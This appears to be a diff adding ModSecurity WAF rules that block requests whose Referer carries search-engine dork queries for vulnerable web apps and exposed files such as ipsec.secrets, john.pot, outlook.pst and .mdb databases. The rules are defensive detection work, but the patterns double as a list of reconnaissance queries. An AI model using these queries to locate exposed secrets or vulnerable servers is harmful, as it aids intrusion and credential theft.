+SecRule REQUEST_HEADERS:Referer   "intitle:docushare inurl:docushare/dsweb/ -faq -gov -edu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:report everest home edition " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371317,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:apache::status \(inurl:server-status \| inurl:status\.html \| inurl:apache\.html\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371319,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:cgi inurl:editcgi\.cgi inurl:file=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371324,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:putty\.reg" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371326,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "certificate practice statement inurl:\(pdf \| doc\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inf inurl:capolicy\.inf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:log\.nsf -gov" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371334,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin/testcgi\.exe please distribute testcgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:mdb inurl:\*\.mdb inurl:fpdb shop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371338,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "installed objects scanner inurl:default\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371340,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:odbc\.ini ext:ini -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371342,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/_layouts/settings" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371345,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pst inurl:outlook\.pst" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/names\.nsf\?opendatabase -inurl:gov" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371350,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:xls inurl:email\.xls " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371353,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pot inurl:john\.pot " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371354,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:snitz_forums_2000\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:asp inurl:pathto\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371363,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:xls -site:gov inurl:contact" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371364,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(inurl:robot\.txt \| inurl:robots\.txt \) in(?:text|body):disallow filetype:txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371367,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\*db filetype:mdb " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371372,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:profiles filetype:mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371376,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:forum filetype:mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371379,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:backup filetype:mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371380,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:email filetype:mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ssl\.conf filetype:conf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371386,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/public/\?cmd=contents" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371393,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf inurl:unrealircd\.conf -cvs -gentoo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371394,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:forward filetype:forward -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371397,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:intranet inurl:intranet \+in(?:text|body):phone" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371404,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf inurl:firewall -intitle:cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371415,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:smb\.conf in(?:text|body):workgroup filetype:conf conf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:tdbin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371417,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:server-info apache server information" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371419,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:perl/printenv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371420,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin/printenv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371421,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:fcgi-bin/echo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371422,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:server-status apache" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371423,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:servlet/snoopservlet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371426,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/examples/jsp/snp/snoop\.jsp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371427,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:newsletter/admin/ intitle:newsletter admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371428,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:newsletter/admin/ intitle:newsletter admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371429,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:admin filetype:xls" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:admin intitle:login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ipsec\.conf -intitle:manpage" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ipsec\.secrets holds shared secrets" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ipsec\.secrets -history -bugs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:'cgiirc\.config'" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wl\.exe inurl:\?ss1= in(?:text|body):operating system: -edu -gov -mil" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371482,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:nnls_brand\.html or inurl:nnls_nav\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371483,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(inurl:81-cobalt \| inurl:cgi-bin/\.cobalt\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:oraweb -site:oraweb\.org" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371497,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "netware \* home inurl:nav\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371498,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "xampp inurl:xampp/index" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:2506/jana-admin " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371500,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "switch to table format inurl:table\|plain" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371506,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:answerbook2 inurl:ab2/ \(inurl:8888 \| inurl:8889\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371513,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:page rev \*/\*/\* inurl:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371533,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\.nsconfig -sa" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371535,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:snap\.server inurl:func=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371538,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:tech-support inurl:show cisco" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371546,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:simplenews/admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371551,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:guestbook/guestbooklist\.asp post date from country" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371553,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:control panel control panel login articlelive inurl:admin -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371557,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cartwiz/store/index\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371558,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "maxwebportal inurl:default snitz forums \+homepage -intitle:maxwebportal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371560,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin inurl:bigate\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371574,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pl -in(?:text|body):/usr/bin/perl inurl:webcal \(inurl:webcal \| inurl:add \| inurl:delete \| inurl:config\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371575,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:mdb inurl:news/news" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371576,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:asp powered by duforum inurl:\(messages\|details\|login\|default\|register\) -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371579,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:asp inurl:dugallery intitle:3\.0 -site:dugallery\.com -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371580,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cgi inurl:cachemgr\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371581,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl: wwwadmin\.pl intitle:wwwadmin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371591,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi\.asx\?storeid " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:gallery inurl:setup gallery configuration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371595,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:nph-proxy\.cgi start browsing through this cgi-based proxy" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371596,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:robpoll\.cgi filetype:cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371599,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:cgi inurl:ubb6_test\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371601,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of ios -site:cisco\.com -inurl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371608,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of cisco asa -site:cisco\.com -inurl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371609,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:install\.pl in(?:text|body):reading path paramaters -edu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371612,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "log inurl:linklint filetype:txt -checking" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:upload inurl:upload in(?:text|body):upload -forum -shop -support -w3c " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371627,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/\*/_vti_pvt/ \| inurl:/\*/_vti_cnf/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371629,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of \(inurl:fileadmin \| intitle:fileadmin\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371641,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):d\.aspx\?id \|\| inurl:d\.aspx\?id" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371644,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:explorer\.cfm inurl:\(dirpath\|this_directory\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371647,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:intranet inurl:intranet \+in(?:text|body):human resources" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/tmp " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/pls/sample/admin_/help/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371655,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
